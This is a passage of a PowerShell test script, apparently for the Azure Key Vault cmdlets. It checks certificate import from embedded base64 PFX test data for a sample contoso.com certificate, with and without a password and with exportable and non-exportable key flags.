uou1I1HU+HFuq2bx5nMIHjqYq/LckA7YqzVyRtkbf1I2FASAWfGoGryhsltm2Y+usBzcq1Krcxyz8NVAl1Cr3WGCGwXAfuDPZ9dYVOJAMphQZubQTuhuS0tSL2b64fpEt1Jh9MSMGEmtLWQrpOh5zeBbr6vpKvzWsOmi0q2/5+anOsqOurGUx2ghaLtSE/IIHWtFjT65Dg9M8Rt4Cwp17hq9Yyesg+iJcfgUyLyBVgn7SVqvejT2Y1i0E4OCKnLYZYbkW4MYDx2hwhQl8KfV/OB6Rf6S0MTpePnWQrNk8wLsc8bArN18LHQDJ0lx2QBFbH1qm9xZOTUpA/7FA3MNKB3AETakIe5sQvIn9mg6M41brwLuyv/KGNX6BYEW270KA6h/2w294Sm9F0E3htC2tGWIzu8qe7g1TQP9h86d1z01ymKR6GFdqlr9V6OLSxZzJCrKEnN3SndrWn36oCLKkW+9FnSXV8rxO8BpeGrUuDh433lZuW0qqkLjUwtBq1Tbn8ZaNUnoE1FnlHkzKc3JvJVLxJsyxJXIOqx1HpxF1Iml9EGie0/tYu2N0W78ejpGlpz8qtNNvsHfO1oKXCXwAXLrdbxXN9CcHWhPOI4oOV5+5TUIp5djBd92KbnYw0oxHpaDTk2kexzCx2amuMZWkKiFrLnCkyspq8+lDHuQhvzYuLZm7OoidsF5mk2tH0jzjkhEyXL3r20jOiZKt3crCk54MclfeYX0hlr6u99UHBeSzLKJrUcBLq8l6ejaNNcX2trvL+tPF0lt2kICamnY1gxputYShUvkQ6pRhnaqK+sBN6i5ESx8+qgvGSwJNRVkiMfgam1PRw1bLGPi9/vqT6xEoxwMHjmMo/pZ15K5nfXkd9atlD9v753I8nNDv82+HmB0CN0jdAwjkUVeR7r77GKIPIK/OhHkIne2htJlh8FFrpRBHcyVavbIMChTfL0YtoKn4WrdKB3HN1uY0mrFLLbxqLINFci5vYytCOvJl0PwEa11poLYndDjVc+JCwN61ls6/o7AjnfBkQ+qBjbBHGQsUGWAKawBiTElMCMGCSqGSIb3DQEJFTEWBBStC6dijctuxU/38o5u5840mbAxJDAxMCEwCQYFKw4DAhoFAAQURKD0eaC4iNDqx+mMq9vefS1LtBEECLRMZqyO3sirAgIIAA=="
$pfxBytes = [System.Convert]::FromBase64String($pfxBase64)
$certCollection = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2Collection
$certCollection.Import($pfxBytes, "1234", [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::Exportable)
$cert = Import-AzKeyVaultCertificate $keyVault $certificateName -CertificateCollection $certCollection
Assert-NotNull $cert
Assert-NotNull $cert.Name
$x509FromSecret = Get-X509FromSecretBySubjectDistinguishedName $keyVault $cert.Name "CN=contoso.com, O=Contoso, L=Portland, S=Oregon, C=US"
Assert-NotNull $x509FromSecret
Assert-True { $x509FromSecret.HasPrivateKey }
$key = Get-AzKeyVaultKey $keyVault $cert.Name
Assert-NotNull $key
}
function Test_ImportX509Certificate2CollectionNotExportableAsCertificate
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'importx509certificate2collectionascertificate'
$pfxBase64 = "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"
$pfxBytes = [System.Convert]::FromBase64String($pfxBase64)
$certCollection = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2Collection
$certCollection.Import($pfxBytes, "1234", [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::DefaultKeySet)
Assert-Throws { $cert = Import-AzKeyVaultCertificate $keyVault $certificateName -CertificateCollection $certCollection }
}
function Test_ImportBase64EncodedStringAsCertificate
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'importbase64encodedstringascertificate'
$pfxBase64 = "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"
$pfxPassword = "1234"
$securePfxPassword = ConvertTo-SecureString $pfxPassword -AsPlainText -Force
$cert = Import-AzKeyVaultCertificate $keyVault $certificateName -CertificateString $pfxBase64 -Password $securePfxPassword
Assert-NotNull $cert
Assert-NotNull $cert.Name
$x509FromSecret = Get-X509FromSecretBySubjectDistinguishedName $keyVault $cert.Name "CN=contoso.com, O=Contoso, L=Portland, S=Oregon, C=US"
Assert-NotNull $x509FromSecret
Assert-True { $x509FromSecret.HasPrivateKey }
$key = Get-AzKeyVaultKey $keyVault $cert.Name
Assert-NotNull $key
}
function Test_ImportBase64EncodedStringWithoutPasswordAsCertificate
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'importbase64encodedstringwithoutpasswordascertificate'
$pfxBase64 = "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